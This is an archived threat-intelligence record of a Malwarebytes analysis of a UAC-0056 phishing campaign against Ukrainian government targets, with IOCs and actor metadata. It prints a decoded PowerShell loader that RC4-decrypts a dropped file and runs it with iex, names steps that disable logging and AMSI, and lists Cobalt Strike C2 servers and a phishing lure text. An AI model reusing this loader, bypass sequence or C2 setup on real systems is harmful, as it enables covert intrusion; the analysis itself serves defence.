{ "id": "0c32c69f-868c-425e-b823-e4f4c8799584", "created_at": "2026-04-06T00:15:56.07733Z", "updated_at": "2026-04-10T03:35:37.630032Z", "deleted_at": null, "sha1_hash": "59bc2ddd6758cf529b33ba5d7972c9db36002596", "title": "Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2018679, "plain_text": "Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest\r\ncampaign\r\nBy Mark Stockley\r\nPublished: 2022-07-12 · Archived: 2026-04-05 16:34:42 UTC\r\nThis blog was authored by Roberto Santos and Hossein Jazi\r\nThe Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with\r\nhigh confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted the government entities\r\nin Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).\r\nLures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have\r\nbeen closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.\r\nIn this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have\r\nobserved. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the\r\nend of June.\r\nDifferent themes, same techniques\r\nSince the publication of our blog post There’s a Go Elephant in the room, we have tracked several new samples as can be\r\nseen in the timeline below:\r\nArticle continues below this ad.\r\nLet’s dig further into those relationships. UA-CERT has attributed the document named “Information on the availability of\r\nvacancies and their staffing.xls” to UAC-0056. This file looked familiar to us and for good reason because the macro is\r\nnearly identical to the document we analyzed in our initial blog:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/\r\nPage 1 of 7\n\nIn the most recent attack reported by UA-CERT (Humanitarian catastrophe of Ukraine since February 24, 2022.xls) we\r\nsee an almost identical macro to the one used in another decoy document called Help Ukraine.xls:\r\nThe Help Ukraine lure, to our knowledge, has never been publicly documented before:\r\nWe were able to identify 7 different samples with that theme, including one\r\n(258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous\r\nattack:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/\r\nPage 2 of 7\n\nAlso, in the past we have found comments regarding to a domain named ExcelVBA[.]ru. This document was contacting a\r\nsuspiciously similar domain named excel-vba[.]ru.\r\nAmong victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written\r\nin Ukrainian and translates to:\r\nOn February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of\r\nUkraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the\r\nOffice of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens\r\nof Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of\r\ndestroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all\r\nthe data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real\r\nstate of affairs. Glory to Ukraine!\r\nTranslation of original email sent to victims\r\nWe will focus our analysis on these 3 newer templates. Exact names and paths are from\r\n024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (Information on the availability of vacancies\r\nand their staffing.xls). The analysis is still valid for the others, while minor changes exist between samples.\r\nwrite.bin\r\nThe document will download an executable file named write.bin. Other attacks following the same scheme used different\r\nnames for this file, including Office.exe, baseupd.exe and DataSource.exe. The file is slightly obfuscated, and performs the\r\nfollowing actions:\r\nEstablishing persistence\r\nAfter some antidebug tricks, the registry key HKCUSoftwareMicrosoftWindowsCurrentVersionRunCheck License is used to\r\nestablish persistence.\r\nHKCUSoftwareMicrosoftWindowsCurrentVersionRunUpdate Checker\r\n, is checked first because that was the key used by previous versions of the malware.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/\r\nPage 3 of 7\n\nDropping next stage\r\nNext step is dropping a file in C:ProgramDataTRYxaEbX.  This file will be used later.\r\nThe payload will execute the following powershell Base64 encoded command:\r\nJABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQA\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/\r\nPage 4 of 7\n\nThe chunk before is Base64 encoded; which decodes to:\r\n$A1 = [System.IO.File]::ReadAllBytes(\"C:ProgramDataTRYxaEbX\");\r\n$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=\r\n($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};\r\n$C = (\u0026 $A $A1 $B1);\r\n$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);\r\n$E = $E -Split [Environment]::NewLine;\r\nforeach($EE in $E){iex $($EE+\";\");};\r\nIn short the file dropped in  C:ProgramDataTRYxaEbX will be decrypted using \r\nCmAJngvdDmiTjLxN\r\nas key using the RC4 algorithm. This next PowerShell script will look like:\r\nHere we can see some of the actions that will be taken:\r\nDisable script logging\r\nDisable Module Logging\r\nDisable Transcription\r\nDisable AMSI protection\r\nAfter this step, another Base64 payload is decoded and executed:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/\r\nPage 5 of 7\n\nCobalt Strike payload deployed\r\nAs it can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. This shellcode can be\r\n32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:\r\nBeaconType                    – HTTPS\r\nPort                              – 443\r\nSleepTime                       – 30000\r\nPublicKey_MD5              – defb5d95ce99e1ebbf421a1a38d9cb64\r\nC2Server                         – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/\r\nUserAgent                       – Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap\r\nHttpPostUri                    – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/\r\nWatermark                      – 1580103824\r\nBy having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.\r\nAttacker probes the sandbox\r\nAt the time of writing, malicious C\u0026C servers seem to be down. However, on July 5 we saw active servers and successful\r\nconnections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the\r\ncontent of several folders.\r\nWe were able to decode the network communications using Didier Steven’s excellent collection of Cobalt Strike tools.\r\nWe consider these actions preliminary moves to check whether the machine is a viable target or not before following up with\r\nother actions.\r\nAttribution to UAC-0056\r\nBased on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can\r\nattribute this attack with high confidence to UAC-0056.\r\nSignatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key\r\ndefb5d95ce99e1ebbf421a1a38d9cb64\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/\r\nPage 6 of 7\n\n), may be used to connect the attack to other groups. For instance, the public key should be unique among deployments,\r\naccording to the CobaltStrike documentation.\r\nHowever, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed\r\nin this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a\r\nleaked version of Cobalt Strike and used the same private key as others, making attribution harder.\r\nMalwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.\r\nIOCs\r\nMalicious Excel documents (Help Ukraine template)\r\nfe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3\r\nc9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a\r\n1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532 258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0\r\ne663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386\r\necd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff\r\neac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df\r\nMalicious Excel documents (Humanitarian template)\r\n024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1\r\n14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea\r\n474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d\r\nPayloads\r\n0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470\r\naadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a\r\nfb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346\r\n501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff\r\nCobalt Strike beacon and payloads\r\n136.144.41[.]177\r\nsyriahr[.]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/\r\nsyriahr[.]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/\r\nskreatortemp[.]site\r\nimolaoggi[.]eu\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/" ], "report_names": [ "cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "eecf54a2-2deb-41e5-9857-fed94a53f858", "created_at": "2023-01-06T13:46:39.349959Z", "updated_at": "2026-04-10T02:00:03.296196Z", "deleted_at": null, "main_name": "SaintBear", "aliases": [ "Bleeding Bear", "Cadet Blizzard", "Nascent Ursa", "Nodaria", "Storm-0587", "DEV-0587", "Saint Bear", "EMBER BEAR", "UNC2589", "TA471", "UAC-0056", "FROZENVISTA", "Lorec53", "Lorec Bear" ], "source_name": "MISPGALAXY:SaintBear", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c28760b2-5ec6-42ad-852f-be00372a7ce4", "created_at": "2022-10-27T08:27:13.172734Z", "updated_at": "2026-04-10T02:00:05.279557Z", "deleted_at": null, "main_name": "Ember Bear", "aliases": [ "Ember Bear", "UNC2589", "Bleeding Bear", "DEV-0586", "Cadet Blizzard", "Frozenvista", "UAC-0056" ], "source_name": "MITRE:Ember Bear", "tools": [ "P.A.S. Webshell", "CrackMapExec", "ngrok", "reGeorg", "WhisperGate", "Saint Bot", "PsExec", "Rclone", "Impacket" ], "source_id": "MITRE", "reports": null }, { "id": "03a6f362-cbab-4ce9-925d-306b8c937bf1", "created_at": "2024-11-01T02:00:52.635907Z", "updated_at": "2026-04-10T02:00:05.339384Z", "deleted_at": null, "main_name": "Saint Bear", "aliases": [ "Saint Bear", "Storm-0587", "TA471", "UAC-0056", "Lorec53" ], "source_name": "MITRE:Saint Bear", "tools": [ "OutSteel", "Saint Bot" ], "source_id": "MITRE", "reports": null }, { "id": "083d63b2-3eee-42a8-b1bd-54e657a229e8", "created_at": "2022-10-25T16:07:24.143338Z", "updated_at": "2026-04-10T02:00:04.879634Z", "deleted_at": null, "main_name": "SaintBear", "aliases": [ "Ember Bear", "FROZENVISTA", "G1003", "Lorec53", "Nascent Ursa", "Nodaria", "SaintBear", "Storm-0587", "TA471", "UAC-0056", "UNC2589" ], "source_name": "ETDA:SaintBear", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Elephant Client", "Elephant Implant", "GraphSteel", "Graphiron", "GrimPlant", "OutSteel", "Saint Bot", "SaintBot", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434556, "ts_updated_at": 1775792137, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/59bc2ddd6758cf529b33ba5d7972c9db36002596.pdf", "text": "https://archive.orkl.eu/59bc2ddd6758cf529b33ba5d7972c9db36002596.txt", "img": "https://archive.orkl.eu/59bc2ddd6758cf529b33ba5d7972c9db36002596.jpg" } }